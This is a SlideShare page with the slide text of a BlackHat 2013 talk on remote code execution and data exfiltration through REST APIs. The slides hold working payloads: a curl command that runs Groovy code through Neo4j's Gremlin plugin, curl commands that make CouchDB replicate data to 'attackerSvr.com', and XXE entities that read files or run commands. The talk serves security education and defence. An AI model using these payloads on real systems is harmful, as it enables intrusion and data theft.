SlideShare une entreprise Scribd logo

Resting on your laurels will get you powned

Dinis Cruz
Dinis Cruz

Presentation delivered at BlackHat 2013. See these posts for more details on the Demos: http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html ., http://blog.diniscruz.com/2013/08/neo4j-csrf-payload-to-start-processes.html

Technologie
1  sur  46
Télécharger pour lire hors ligne
RESTing On Your Laurels Will Get You Pwned By Abraham Kang, Dinis Cruz, and Alvaro Munoz
Goals and Main Point • Originally a 2 hour presentation so we will only be focusing on identifying remote code execution and data exfiltration vulnerabilities through REST APIs. • Remember that a REST API is nothing more than a web application which follows a structured set of rules. – So all of the previous application vulnerabilities still apply: SQL Injection, XSS, Direct Object Reference, Command Injection, etc. • We are going to show you how remote code execution and data filtration manifest themselves in REST APIs.
Causes of REST Vulnerabilities • Location in the trusted network of your data center • History of REST Implementations • SSRF (Server Side Request Forgery) to Internal REST APIs • URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI) • Self describing and predicable nature • Inbred Architecture • Extensions in REST frameworks that enhance development of REST functionality at the expense of security • Incorrect assumptions of application behavior • Input types and interfaces
REST History • Introduced to the world in a PHD dissertation by Roy Fielding in 2000. • Promoted HTTP methods (PUT, POST, GET, DELETE) and the URL itself to communicate additional metadata as to the nature of an HTTP request. Http Method Database Operation PUT Update POST Insert GET Select DELETE Delete • GET • PUT http://svr.com/customers/123 http://svr.com/customers/123
REST History (Bad Press) • When REST originally came out, it was harshly criticized by the security community as being inherently unsafe. – As a result REST, applications were originally developed to only run on internal networks (nonpublic access). • This allowed developers to develop REST APIs in a kind of “Garden of Eden” – This also encouraged REST to become a popular interface for internal backend systems. – Once developers got comfortable with REST internal applications they are now RESTifying all publically exposed application interfaces
Oracle AS1 FW BH1 Attacker FW Attacking Backend Systems (Trad Method) LDAP/ AD Neo4j SAP AS4 ERP AS5 … MS SQL AS2 FW FW AS3 FW BH4 Internet BH5 FW BH2 FW BH3 Internet FW Internet FW Internet FW Mongo Http Protocol (proprietary protocols are different colors) Couch Cassan EAI EII ESB HBase …
Compromised/Pwned machine Oracle SAP MS SQL AS2 AS3 ERP Y … Non-compromised machine AS4 X LDAP/ AD Neo4j Mongo AS5 • Pwn the application server • Figure out which systems are running on the internal network and target a data rich server. (Port Scanning and Fingerprinting) • Install client protocol binaries to targeted system (in this case SAP client code) or mount network attacks directly. • Figure out the correct parameters to pass to the backend system by sniffing the network, reusing credentials, using default userids and passwords, bypassing authentication, etc. AS1 Attacking An Internal Network (Trad Method) Couch Cassan EAI EII ESB HBase …
Non-compromised machine Y Affected machine REST API X REST API Pub REST API REST API ODATA in MS SQL Server Beehive and OAE RESTful API Neo4j, Mongo, Couch, Cassandra, HBase, your company, and many more Couch REST API – – – Mongo Cassan REST API What backend systems have a REST API that we can attack: SAP • Neo4j HBase … … • SAP REST API • Find an HTTP REST proxy w/ vulns Figure out which REST based systems are running on the internal network Exfiltrate data from the REST interface of the backend system or Get RCE on an internal REST API AS5 • • REST API Attacking An Internal Network (REST style) REST EAI EII ESB
SSRF (Server Side Request Forgery) to Internal REST APIs • Attackers can take advantage of any server-side request forwarding or server-side request proxying mechanisms to attack internal-only REST APIs. – Examples: RFI through PHP include(), REST framework specific proxy (RESTlet Redirector), XXE, WS-* protocols, etc. • Most internal REST APIs are using basic auth over SSL. So you can use the same attacks above to find the basic auth credentials on the file system and embed them in the URL: – http://user:password@internalSvr.com/xxx...
Internal REST API • Most publically exposed REST APIs turn around and invoke internal REST APIs using URLConnections, Apache HttpClient or other REST clients. If user input is directly concatenated into the URL used to make the backend REST request then the application could be vulnerable to Extended HPPP. Pub REST API URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI) DB
What to Look For • new URL (“http://yourSvr.com/value” + var); • new Redirector(getContext(), urlFromCookie, MODE_SERVER_OUTBOUND ); • HttpGet(“http://yourSvr.com/value” + var); • HttpPost(“http://yourSvr.com/value” + var); • restTemplate.postForObject( ”http://localhost :8080/Rest/user/” + var, request, User.class ); • ...
Extended HPPP (HTTP Path & Parameter Pollution) • HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola and Luca Carettoni in 2009. It utilized the discrepancy in how duplicate request parameters were processed to override application specific default values in URLs. Typically attacks utilized the “&” character to fool backend services in accepting attacker controlled request parameters. • Extended HPPP utilizes matrix and path parameters, JSON injection and path segment characters to change the underlying semantics of a REST URL request. – “#” can be used to remove ending URL characters similar to “--” in SQL Injection and “//” in JavaScript Injection – “../” can be used to change the overall semantics of the REST request in path based APIs (vs query parameter based) – “;” can be used to add matrix parameters to the URL at different path segments – The “_method” query parameter can be used to change a GET request to a PUT, DELETE, and sometimes a POST (if there is a bug in the REST API) – Special framework specific query parameters allow enhanced access to backend data through REST API. The “qt” parameter in Apache Solr – JSON Injection is also used to provide the necessary input to the application receiver.
Extended HPPP (Apply Your Knowledge I) String entity = request.getParameter(“entity”); String id = request.getParameter(“id”); URL urlGET = new URL(“http://svr.com:5984/customers/” + entity + “?id=“ + id ); Change it to a PUT to the following URL http://svr.com:5984/admin
REST is Self Describing and Predictable • What URL would you first try when gathering information about a REST API and the system that backs it?
REST is Self Describing and Predictable • What URL would you first try when gathering information about a REST API and the system that backs it? – http://host:port/ • Compare this to: – Select * from all_tables (in Oracle) – sp_msforeachdb 'select "?" AS db, * from [?].sys.tables' (SQL Server) – SELECT DISTINCT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME IN ('columnA','ColumnB') AND TABLE_SCHEMA='YourDatabase'; (My SQL) – Etc.
Especially for NoSQL REST APIs • All of the following DBs have REST APIs which closely follow their database object structures – HBase – Couch DB – Mongo DB – Cassandra.io – Neo4j
HBase REST API • Find all the tables in the Hbase Cluster: – http://host:9000/ • Find the running HBase version: – http://host:9000/version • Find the nodes in the HBase Cluster: – http://host:9000/status/cluster • Find a description of a particular table’s schema(pick one from the prior link): – http://host:port/profile/schema
Couch DB REST API • Find Version – http://host:5984 • Find all databases in the Couch DB: – http://host:5984/_all_dbs • Find all the documents in the Couch DB: – http://host:5984/{db_name}/_all_docs
Neo4j REST API • Find version and extension information in the Neo4j DB: – http://host:7474/db/data/
Mongo DB REST API • Find all databases in the Mongo DB: – http://host:27080/ – http://host:27080/api/1/databases • Find all the collections under a named database ({db_name}) in the Mongo DB: – http://host:27080/api/1/database/{db_name}/collect ions
Cassandra.io REST API • Find all keyspaces in the Cassandra.io DB: – http://host:port/1/keyspaces • Find all the column families in the Cassandra.io DB: – http://host:port/1/columnfamily/{keyspace_name }
Internal REST API • Externally exposed REST APIs typically use the same communication protocol (HTTP) and REST frameworks that are used in internal only REST APIs. • Any vulnerabilities which are present in the public REST API can be used against the internal REST APIs. Pub REST API Inbred Architecture Internal DB
Extensions in REST frameworks that enhance development of REST functionality at the expense of security • Turns remote code execution and data exfiltration from a security vulnerability into a feature. – In some cases it is subtle: • Passing in partial script blocks used in evaluating the processing of nodes. • Passing in JavaScript functions which are used in map-reduce processes. – In others it is more obvious: • Passing in a complete Groovy script which is executed as a part of the request on the server. Gremlin Plug-in for Neo4j. • Passing in the source and target URLs for data replication
Rest Extensions Remote Code Execution(Demo) • curl -X POST http://localhost:7474/db/data/ext/GremlinPlugi n/graphdb/execute_script -d '{"script":"import java.lang.Runtime;rt = Runtime.getRuntime().exec("c:/Windows/System3 2/calc.exe")", "params": {} }' -H "Content-Type: application/json"
Rest Extensions Data Exfiltration Example (Couch DB) • curl –X POST http://internalSrv.com:5984/_replicate –d ‘{“source”:”db_name”, “target”:”http://attackerSvr.com:5984/corpData” }’ –H “Content-Type: application/json” • curl –X POST http://srv.com:5984/_replicate –d ‘{“source”:”http://anotherInternalSvr.com:5984/ db”, “target”:”http://attackerSvr.com:5984/corpData” }’ –H “Content-Type: application/json”
Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL urlPost = new URL(“http://svr.com:5984/customers/” + id); String name = request.getParameter(“name”); String json = “{”fullName”:”” + name + “”}”; How can you exfiltrate the data given the above?
Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB) String id = request.getParameter(“id”); URL url = new URL(“http://svr.com:5984/customers/../_replicate”); String name = request.getParameter(“name”); String json = “{”fullName”:”X”, ”source”:”customers”, ”target”:”http://attackerSvr.com:5984/corpData”}”; Attacker provides: id = “../_replicate” name = ‘X”, “source”:”customers”, “target”:”http://attackerSvr.com:5984/corpData’
Reliance on incorrectly implemented protocols (SAML, XML Signature, XML Encryption, etc.) • SAML, XML Signature, XML Encryption can be subverted using wrapping based attacks.* See: How to Break XML Encryption by Tibor Jager and Juraj Somorovsky, On Breaking SAML: Be Whoever You Want to Be by Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco Kampmann, and Meiko Jensen, and How To Break XML Signature and XML Encryption by Juraj Somorovsky (OWASP Presentation)
Incorrect assumptions of REST application behavior • REST provides for dynamic URLs and dynamic resource allocation
REST provides for dynamic URLs and dynamic resource allocation Example Case Study • You have an Mongo DB REST API which exposes two databases which can only be accessed at /realtime/* and /predictive/* • There are two static ACLs which protect all access to each of these databases <web-resource-name>Realtime User</web-resource-name> <urlpattern>/realtime/*</url-pattern> <web-resource-name>Predictive Analysis User</web-resource-name> <url-pattern>/predicitive/*</url-pattern> Can anyone see the problem? You should be able to own the server with as little disruption to the existing databases.
Example Case Study Exploit • The problem is not in the two databases. The problem is that you are working with a REST API and resources are dynamic. • So POST to the following url to create a new database called test which is accessible at “/test”: POST http://svr.com:27080/test • Then POST the following: POST http://svr.com:27080/test/_cmd – With the following body: cmd={…, “$reduce”:”function (obj, prev) { malicious_code() }” …
REST Input Types and Interfaces • Does anyone know what the main input types are to REST interfaces?
REST Input Types and Interfaces • Does anyone know what the main input types are to REST interfaces? – XML and JSON
XML Related Vulnerabilities • When you think of XML--what vulnerabilities come to mind?
XML Related Vulnerabilities • When you think of XML--what vulnerabilities come to mind? – XXE (eXternal XML Entity Injection) / SSRF (Server Side Request Forgery) – XSLT Injection – XDOS – XML Injection – XML Serialization
XXE (File Disclosure and Port Scanning) • Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes. • XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: <?xml encoding=“utf-8” ?> <!DOCTYPE Customer [<!ENTITY y SYSTEM ‘../WEB-INF/web.xml’> ]> <Customer> <name>&y;</name> </Customer> *See Attacking <?xml?> processing by Nicolas Gregoire (Agarri) and XML Out-of-Band Data Retrieval by Timur Yunusov and Alexey Osipov
XXE (Remote Code Execution) • Most REST interfaces take raw XML to de-serialize into method parameters of request handling classes. • XXE Example when the name element is echoed back in the HTTP response to the posted XML which is parsed whole by the REST API: <?xml encoding=“utf-8” ?> <!DOCTYPE Customer [<!ENTITY y SYSTEM ‘expect://ls’> ]> <Customer> <name>&y;</name> </Customer> *See XXE: advanced exploitation, d0znpp, ONSEC *expect protocol requires pexpect module to be loaded in PHP *joernchen has another example at https://gist.github.com/joernchen/3623896
XXE Today • At one time most REST frameworks were vulnerable to XXE • But newer versions have patched this vulnerability. • For more information Timothy Morgan is giving a talk at AppSec USA titled, “What You Didn’t Know About XML External Entities Attacks”.
XML Serialization Vulns • Every REST API allows the raw input of XML to be converted to native objects. This deserialization process can be used to execute arbitrary code on the REST server.
Understanding XML Serialization • Mainly Three Mechanisms Used by Server Logic – Server looks where to go before going • Create an object based on the target type defined in the application then assign values from the xml to that instance – Server asks user where to go • Create and object based on a user specified type in the provided XML then assign values (to public or private fields) from the xml to that instance, finally cast the created object to the target type defined in the application – Server asks user where to go and what to do • Create and object based on a user specified type in the provided XML then assign values from the xml to that instance, allow object assignments and invoke arbitrary methods on the newly created instance, finally cast the created object to the target type defined in the application
Vulnerable XML Serialization APIs • In our research we found one API that “asks the user where to go”: – XStream • More limited • Cannot invoke methods • Relies on existing APIs to trigger the code execution • And another that “asks the user where to go and what to do”: – XMLDecoder • Unrestricted • execute arbitrary methods on newly created objects which are defined in the input • Near Turning complete
XML Serialization Remote Code Execution – XStream (Demo) • new XStreamRepresentation(…) • <bean id="xstreamMarshaller“ class="org.springframework.oxm.xstream.XStreamM arshaller"> • Alvaro Munoz figured this out
XML Serialization Remote Code Execution – XMLDecoder(Demo) • new ObjectRepresentation • Direct Usage of XMLDecoder* XMLDecoder dec = new XMLDecoder( new ByteArrayInputStream(bad_bytes)); values = (List<YourObject>) dec.readObject(); • If you notice that XMLDecoder file is processed by backend systems then you have a serious compromise by anyone who maliciously controls the XML – Look for the following in your XML <java class="java.beans.XMLDecoder"> <object class="Customer" id="Customer0"> *Modified Version of code from the chapter “A RESTful version of the Team Services” of “Java Web Services: Up and Running” by Martin Kalin
XML Serialization Remote Shell (Demo)
Conclusion • By now you should agree that publically exposed or internal REST APIs probably have remote code execution or data exfiltration issues.
Questions ?

Recommandé

Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)CODE WHITE GmbH
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...joaomatosf_
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Christian Schneider
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)CODE WHITE GmbH
 
Black Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized CommunicationBlack Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized Communicationmsaindane
 
Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Salesforce Engineering
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 

Recommandé

Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassCODE WHITE GmbH
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)CODE WHITE GmbH
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...joaomatosf_
 
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016
Serial Killer - Silently Pwning your Java Endpoints // OWASP BeNeLux Day 2016Christian Schneider
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)CODE WHITE GmbH
 
Black Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized CommunicationBlack Hat EU 2010 - Attacking Java Serialized Communication
Black Hat EU 2010 - Attacking Java Serialized Communicationmsaindane
 
Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Fixing the Java Serialization Mess
Fixing the Java Serialization Mess Salesforce Engineering
 
Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization Vulnerabilities Defending against Java Deserialization Vulnerabilities
Defending against Java Deserialization VulnerabilitiesLuca Carettoni
 
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Christian Schneider
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
Exploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaExploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaCODE WHITE GmbH
 
SyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserializationSyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserializationDavid Jorm
 
Deserialization vulnerabilities
Deserialization vulnerabilitiesDeserialization vulnerabilities
Deserialization vulnerabilitiesGreenD0g
 
Abusing Java Remote Interfaces
Abusing Java Remote InterfacesAbusing Java Remote Interfaces
Abusing Java Remote Interfacesjuanvazquezslides
 
Hacking oracle using metasploit
Hacking oracle using metasploitHacking oracle using metasploit
Hacking oracle using metasploitAlberto García Illera
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx France55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx FranceDavid Delabassee
 
Spring & Hibernate
Spring & HibernateSpring & Hibernate
Spring & HibernateJiayun Zhou
 
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Christian Schneider
 
Bytecode manipulation with Javassist and ASM
Bytecode manipulation with Javassist and ASMBytecode manipulation with Javassist and ASM
Bytecode manipulation with Javassist and ASMashleypuls
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Java Programming - 01 intro to java
Java Programming - 01 intro to javaJava Programming - 01 intro to java
Java Programming - 01 intro to javaDanairat Thanabodithammachari
 
JVM
JVMJVM
JVMMurali Pachiyappan
 
Getting started with Java 9 modules
Getting started with Java 9 modulesGetting started with Java 9 modules
Getting started with Java 9 modulesRafael Winterhalter
 
Tornado Web Server Internals
Tornado Web Server InternalsTornado Web Server Internals
Tornado Web Server InternalsPraveen Gollakota
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworksphanleson
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
 
NodeJS security - still unsafe at most speeds - v1.0
NodeJS security - still unsafe at most speeds - v1.0NodeJS security - still unsafe at most speeds - v1.0
NodeJS security - still unsafe at most speeds - v1.0Dinis Cruz
 
Driving Member Engagement by Showing #VolunteerLove
Driving Member Engagement by Showing #VolunteerLoveDriving Member Engagement by Showing #VolunteerLove
Driving Member Engagement by Showing #VolunteerLoveMariner Management / Peggy Hoffman
 

Contenu connexe

Tendances

OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...Christopher Frohoff
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Christian Schneider
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
Exploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaExploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaCODE WHITE GmbH
 
SyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserializationSyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserializationDavid Jorm
 
Deserialization vulnerabilities
Deserialization vulnerabilitiesDeserialization vulnerabilities
Deserialization vulnerabilitiesGreenD0g
 
Abusing Java Remote Interfaces
Abusing Java Remote InterfacesAbusing Java Remote Interfaces
Abusing Java Remote Interfacesjuanvazquezslides
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx France55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx FranceDavid Delabassee
 
Spring & Hibernate
Spring & HibernateSpring & Hibernate
Spring & HibernateJiayun Zhou
 
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Christian Schneider
 
Bytecode manipulation with Javassist and ASM
Bytecode manipulation with Javassist and ASMBytecode manipulation with Javassist and ASM
Bytecode manipulation with Javassist and ASMashleypuls
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9sumsid1234
 
Getting started with Java 9 modules
Getting started with Java 9 modulesGetting started with Java 9 modules
Getting started with Java 9 modulesRafael Winterhalter
 
Tornado Web Server Internals
Tornado Web Server InternalsTornado Web Server Internals
Tornado Web Server InternalsPraveen Gollakota
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworksphanleson
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
 

Tendances (20)

OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
OWASP SD: Deserialize My Shorts: Or How I Learned To Start Worrying and Hate ...
 
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
 
Exploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaExploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in Java
 
SyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserializationSyScan 2016 - Remote code execution via Java native deserialization
SyScan 2016 - Remote code execution via Java native deserialization
 
Deserialization vulnerabilities
Deserialization vulnerabilitiesDeserialization vulnerabilities
Deserialization vulnerabilities
 
Abusing Java Remote Interfaces
Abusing Java Remote InterfacesAbusing Java Remote Interfaces
Abusing Java Remote Interfaces
 
Hacking oracle using metasploit
Hacking oracle using metasploitHacking oracle using metasploit
Hacking oracle using metasploit
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx France55 new things in Java 7 - Devoxx France
55 new things in Java 7 - Devoxx France
 
Spring & Hibernate
Spring & HibernateSpring & Hibernate
Spring & Hibernate
 
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
Security DevOps - Wie Sie in agilen Projekten trotzdem sicher bleiben // DevO...
 
Bytecode manipulation with Javassist and ASM
Bytecode manipulation with Javassist and ASMBytecode manipulation with Javassist and ASM
Bytecode manipulation with Javassist and ASM
 
Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9Hacking Oracle From Web Apps 1 9
Hacking Oracle From Web Apps 1 9
 
Java Programming - 01 intro to java
Java Programming - 01 intro to javaJava Programming - 01 intro to java
Java Programming - 01 intro to java
 
JVM
JVMJVM
JVM
 
Getting started with Java 9 modules
Getting started with Java 9 modulesGetting started with Java 9 modules
Getting started with Java 9 modules
 
Tornado Web Server Internals
Tornado Web Server InternalsTornado Web Server Internals
Tornado Web Server Internals
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructure
 

En vedette

NodeJS security - still unsafe at most speeds - v1.0
NodeJS security - still unsafe at most speeds - v1.0NodeJS security - still unsafe at most speeds - v1.0
NodeJS security - still unsafe at most speeds - v1.0Dinis Cruz
 
The 4 Stages Of Learning
The 4 Stages Of LearningThe 4 Stages Of Learning
The 4 Stages Of LearningStu Lunn
 
テキスト1(公開版)
テキスト1(公開版)テキスト1(公開版)
テキスト1(公開版)Yasuji Suda
 
OER World Map: Adolescence of a Community Platform
OER World Map: Adolescence of a Community PlatformOER World Map: Adolescence of a Community Platform
OER World Map: Adolescence of a Community PlatformJan Neumann
 
Oferta agregada y demanda agregada
Oferta agregada y demanda agregadaOferta agregada y demanda agregada
Oferta agregada y demanda agregadaKarlabahe1
 
Being an ally to trans
Being an ally to transBeing an ally to trans
Being an ally to transPip Nosegroeg
 
Deben elegirse a 2 comisionados del Instituto de Acceso a la Información Públ...
Deben elegirse a 2 comisionados del Instituto de Acceso a la Información Públ...Deben elegirse a 2 comisionados del Instituto de Acceso a la Información Públ...
Deben elegirse a 2 comisionados del Instituto de Acceso a la Información Públ...FUSADES
 
Epidemiology of Preterm Birth
Epidemiology of Preterm BirthEpidemiology of Preterm Birth
Epidemiology of Preterm BirthOzella Brundidge
 
Ley de sustancias controladas y poder de estado
Ley de sustancias controladas y poder de estadoLey de sustancias controladas y poder de estado
Ley de sustancias controladas y poder de estadoPrograma Libertas
 
Legalthings e-book
Legalthings e-bookLegalthings e-book
Legalthings e-bookLegalThings
 

En vedette (12)

NodeJS security - still unsafe at most speeds - v1.0
NodeJS security - still unsafe at most speeds - v1.0NodeJS security - still unsafe at most speeds - v1.0
NodeJS security - still unsafe at most speeds - v1.0
 
Driving Member Engagement by Showing #VolunteerLove
Driving Member Engagement by Showing #VolunteerLoveDriving Member Engagement by Showing #VolunteerLove
Driving Member Engagement by Showing #VolunteerLove
 
The 4 Stages Of Learning
The 4 Stages Of LearningThe 4 Stages Of Learning
The 4 Stages Of Learning
 
テキスト1(公開版)
テキスト1(公開版)テキスト1(公開版)
テキスト1(公開版)
 
OER World Map: Adolescence of a Community Platform
OER World Map: Adolescence of a Community PlatformOER World Map: Adolescence of a Community Platform
OER World Map: Adolescence of a Community Platform
 
Oferta agregada y demanda agregada
Oferta agregada y demanda agregadaOferta agregada y demanda agregada
Oferta agregada y demanda agregada
 
Being an ally to trans
Being an ally to transBeing an ally to trans
Being an ally to trans
 
Deben elegirse a 2 comisionados del Instituto de Acceso a la Información Públ...
Deben elegirse a 2 comisionados del Instituto de Acceso a la Información Públ...Deben elegirse a 2 comisionados del Instituto de Acceso a la Información Públ...
Deben elegirse a 2 comisionados del Instituto de Acceso a la Información Públ...
 
Epidemiology of Preterm Birth
